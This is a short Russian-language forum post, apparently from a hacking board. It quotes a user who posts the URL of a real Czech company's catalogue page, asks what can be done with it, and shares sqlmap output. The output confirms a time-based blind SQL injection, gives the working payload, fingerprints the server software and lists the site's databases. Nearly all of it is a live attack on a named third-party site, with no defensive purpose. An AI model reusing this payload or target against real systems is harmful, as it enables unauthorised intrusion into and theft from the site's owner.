23.10.2015, 13:32
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от R3hab
R3hab said:
↑
Код HTML:
HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
что можно сделать? sqlmap берет
Код:
Code:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))mWsI) AND 'FCqd'='FCqd
---
[12:26:48] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.6.0, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
Базы:
available databases [3]:
[*] elektroline
[*] information_schema
[*] test
|
|
|